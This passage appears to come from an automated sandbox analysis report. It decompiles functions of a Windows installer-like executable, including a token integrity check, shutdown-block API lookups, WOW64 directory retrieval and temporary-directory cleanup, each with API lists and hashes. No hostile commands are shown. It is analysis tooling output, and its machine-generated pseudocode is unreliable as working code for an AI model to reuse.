                                                            0x006a5d89
                                                            0x006a5d8c
                                                            0x006a5d9e
                                                            0x006a5da2
                                                            0x006a5dc0
                                                            0x006a5dc2
                                                            0x006a5dc2
                                                            0x006a5dca
                                                            0x006a5dca
                                                            0x006a5dd5

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                            • String ID:
                                                            • API String ID: 215268677-0
                                                            • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                            • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004F5548() {
				signed char _v28;
				void* _t4;
				signed int _t8;
				struct HDC__* _t9;
				struct tagTEXTMETRICW* _t10;

				_t8 = 1;
				_t9 = GetDC(0);
				if(_t9 != 0) {
					_t4 =  *0x6d54b0; // 0x58a00b4
					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsW(_t9, _t10) != 0) {
						_t8 = _v28 & 0x000000ff;
					}
					ReleaseDC(0, _t9);
				}
				return _t8;
			}








                                                            0x004f554d
                                                            0x004f5556
                                                            0x004f555a
                                                            0x004f555c
                                                            0x004f556a
                                                            0x004f5577
                                                            0x004f5577
                                                            0x004f557f
                                                            0x004f557f
                                                            0x004f558b

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004F5551
                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                            • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                            • ReleaseDC.USER32 ref: 004F557F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MetricsObjectReleaseSelectText
                                                            • String ID:
                                                            • API String ID: 2013942131-0
                                                            • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                            • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E006B72C2(void* __ecx, void* __esi, void* __fp0) {
				void* _t21;
				intOrPtr* _t27;
				intOrPtr* _t33;
				void* _t41;
				intOrPtr _t43;
				char _t46;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				intOrPtr _t62;
				void* _t67;

				_t67 = __fp0;
				_t60 = __esi;
				_t47 = __ecx;
				if(( *(_t61 - 9) & 0x00000001) != 0) {
					L3:
					_t46 = 1;
				} else {
					_t64 =  *(_t61 - 9) & 0x00000040;
					if(( *(_t61 - 9) & 0x00000040) != 0) {
						goto L3;
					} else {
						_t46 = 0;
					}
				}
				_t21 = E006A5DD8(_t46, _t47, 0, _t64, _t67);
				_t65 = _t21;
				if(_t21 != 0) {
					_t27 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t27 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_push(_t61);
					_push(0x6b736d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t62;
					_t33 =  *0x6cdec4; // 0x6d579c
					 *((intOrPtr*)(_t61 - 0x18)) =  *((intOrPtr*)( *_t33 + 0x188));
					 *((char*)(_t61 - 0x14)) = 0;
					E004244F8(L"/INITPROCWND=$%x ", 0, _t61 - 0x18, _t61 - 0x10);
					_push(_t61 - 0x10);
					E005C6E90(_t61 - 0x1c, _t46, _t60, _t65);
					_pop(_t41);
					E0040B470(_t41,  *((intOrPtr*)(_t61 - 0x1c)));
					_t43 =  *0x6d68d0; // 0x0
					E006A60E8(_t43, _t46, 0x6cd884,  *((intOrPtr*)(_t61 - 0x10)), _t60, _t65, _t67);
					_pop(_t59);
					 *[fs:eax] = _t59;
					 *((char*)(_t61 - 1)) = 1;
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E006B73CE);
				E0040A1C8(_t61 - 0x1c);
				return E0040A1C8(_t61 - 0x10);
			}
















                                                            0x006b72c2
                                                            0x006b72c2
                                                            0x006b72c2
                                                            0x006b72c6
                                                            0x006b72d2
                                                            0x006b72d2
                                                            0x006b72c8
                                                            0x006b72c8
                                                            0x006b72cc
                                                            0x00000000
                                                            0x006b72ce
                                                            0x006b72ce
                                                            0x006b72ce
                                                            0x006b72cc
                                                            0x006b72d8
                                                            0x006b72dd
                                                            0x006b72df
                                                            0x006b72f4
                                                            0x006b7302
                                                            0x006b7309
                                                            0x006b730a
                                                            0x006b730f
                                                            0x006b7312
                                                            0x006b7319
                                                            0x006b7326
                                                            0x006b7329
                                                            0x006b7337
                                                            0x006b733f
                                                            0x006b7343
                                                            0x006b734b
                                                            0x006b734c
                                                            0x006b7359
                                                            0x006b735e
                                                            0x006b7365
                                                            0x006b7368
                                                            0x006b73a5
                                                            0x006b73a5
                                                            0x006b73ab
                                                            0x006b73ae
                                                            0x006b73b1
                                                            0x006b73b9
                                                            0x006b73c6

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: /INITPROCWND=$%x $@
                                                            • API String ID: 2353593579-4169826103
                                                            • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                            • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 66%
                                                            			E00435608(signed short* __eax, void* __ebx, void* __edx) {
				signed short* _v8;
				char _v16;
				char _v24;
				void* _t23;
				intOrPtr _t31;
				void* _t32;
				void* _t34;

				_t23 = __edx;
				_v8 = __eax;
				_t2 =  &_v24; // 0x435946
				L0042F03C();
				 *[fs:eax] = _t34 + 0xffffffec;
				_t4 =  &_v24; // 0x435946
				E00430ED4( *((intOrPtr*)( *((intOrPtr*)( *0x6cdffc))))(_v8, 0x400, 0, 8,  *[fs:eax], 0x435674, _t34, _t2, __ebx, _t32), 8,  *_v8 & 0x0000ffff);
				_t6 =  &_v16; // 0x43596b
				E0040A61C(_t23,  *_t6);
				_t31 = _t4;
				 *[fs:eax] = _t31;
				_push(E0043567B);
				_t7 =  &_v24; // 0x435946
				return L00431164(_t7);
			}










                                                            0x0043560f
                                                            0x00435611
                                                            0x00435614
                                                            0x00435618
                                                            0x00435628
                                                            0x00435638
                                                            0x0043564f
                                                            0x00435656
                                                            0x00435659
                                                            0x00435660
                                                            0x00435663
                                                            0x00435666
                                                            0x0043566b
                                                            0x00435673

                                                            APIs
                                                            • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                              • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocInitStringVariant
                                                            • String ID: FYC$kYC
                                                            • API String ID: 4010818693-1629163012
                                                            • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                            • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E006B8CAC(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t1;
				int _t9;
				void* _t12;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				intOrPtr _t20;

				_t15 = __edx;
				if( *0x6d68e5 != 0) {
					E00616130(L"Detected restart. Removing temporary directory.", _t12, _t17, _t18);
					_push(0x6b8ce7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t20;
					E006ACE20();
					E006ACB10(_t12, _t15, _t17, _t18);
					_pop(_t16);
					 *[fs:eax] = _t16;
					E00615560();
					_t9 =  *0x6cd884; // 0x1
					return TerminateProcess(GetCurrentProcess(), _t9);
				}
				return _t1;
			}















                                                            0x006b8cac
                                                            0x006b8cb9
                                                            0x006b8cc0
                                                            0x006b8cc8
                                                            0x006b8ccd
                                                            0x006b8cd0
                                                            0x006b8cd3
                                                            0x006b8cd8
                                                            0x006b8cdf
                                                            0x006b8ce2
                                                            0x006b8cf6
                                                            0x006b8cfb
                                                            0x00000000
                                                            0x006b8d07
                                                            0x006b8d10

                                                            APIs
                                                              • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                              • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                              • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                            Strings
                                                            • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                            • String ID: Detected restart. Removing temporary directory.
                                                            • API String ID: 1717587489-3199836293
                                                            • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                            • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 62%
                                                            			E005C8790(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t9;
				void* _t11;
				intOrPtr* _t12;
				void* _t14;
				void* _t15;

				_t14 = __edx;
				_t15 = __eax;
				E005C8820(__eax, __eflags);
				_t12 = E00414020(_t11, _t15, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonCreate");
				if(_t12 == 0) {
					__eflags = 0;
					return 0;
				}
				_t9 =  *_t12(_t15, E0040B278(_t14));
				asm("sbb eax, eax");
				return _t9 + 1;
			}










                                                            0x005c8793
                                                            0x005c8795
                                                            0x005c8799
                                                            0x005c87b3
                                                            0x005c87b7
                                                            0x005c87cc
                                                            0x00000000
                                                            0x005c87cc
                                                            0x005c87c2
                                                            0x005c87c7
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                            • API String ID: 1883125708-2866557904
                                                            • Opcode ID: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                            • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                            • Opcode Fuzzy Hash: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                            • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E005C7488(void* __eax, void* __esi, void* __ebp, void* __eflags) {
				char _v536;
				void* __ebx;
				intOrPtr* _t6;
				void* _t9;
				void* _t15;

				_t9 = __eax;
				E0040A1C8(__eax);
				_t6 = E00414020(_t9, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetSystemWow64DirectoryW");
				if(_t6 != 0) {
					_t6 =  *_t6( &_v536, 0x105);
					if(_t6 > 0 && _t6 < 0x105) {
						return E0040B318(_t9, 0x105, _t15);
					}
				}
				return _t6;
			}








                                                            0x005c748f
                                                            0x005c7493
                                                            0x005c74a8
                                                            0x005c74af
                                                            0x005c74bb
                                                            0x005c74bf
                                                            0x00000000
                                                            0x005c74d1
                                                            0x005c74bf
                                                            0x005c74dd

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 1646373207-1816364905
                                                            • Opcode ID: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                            • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                            • Opcode Fuzzy Hash: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                            • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 45%
                                                            			E005C8644(void* __eax, void* __ecx) {
				void* __ebx;
				void* _t1;
				void* _t4;
				void* _t8;
				intOrPtr* _t9;

				_t1 = __eax;
				_t4 = __eax;
				if( *0x6d57e8 == 0) {
					 *0x6d57ec = E00414020(_t4, _t8, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilter");
					 *_t9 = 0x6d57e8;
					_t1 = 1;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57ec != 0) {
					_t1 =  *0x6d57ec(_t4, 1);
				}
				return _t1;
			}








                                                            0x005c8644
                                                            0x005c8646
                                                            0x005c864f
                                                            0x005c8666
                                                            0x005c866b
                                                            0x005c8675
                                                            0x005c867a
                                                            0x005c867a
                                                            0x005c8684
                                                            0x005c8689
                                                            0x005c8689
                                                            0x005c8691

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                            • API String ID: 1646373207-2498399450
                                                            • Opcode ID: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                            • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                            • Opcode Fuzzy Hash: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                            • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E005C8820(void* __eax, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t7;
				intOrPtr* _t8;
				void* _t9;

				_t9 = __eax;
				_t8 = E00414020(_t7, _t9, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonDestroy");
				if(_t8 == 0) {
					L2:
					return 0;
				} else {
					_push(_t9);
					if( *_t8() != 0) {
						return 1;
					} else {
						goto L2;
					}
				}
			}








                                                            0x005c8822
                                                            0x005c8839
                                                            0x005c883d
                                                            0x005c8846
                                                            0x005c884a
                                                            0x005c883f
                                                            0x005c883f
                                                            0x005c8844
                                                            0x005c884f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x005c8844

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                            • API String ID: 1646373207-260599015
                                                            • Opcode ID: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
                                                            • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                            • Opcode Fuzzy Hash: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
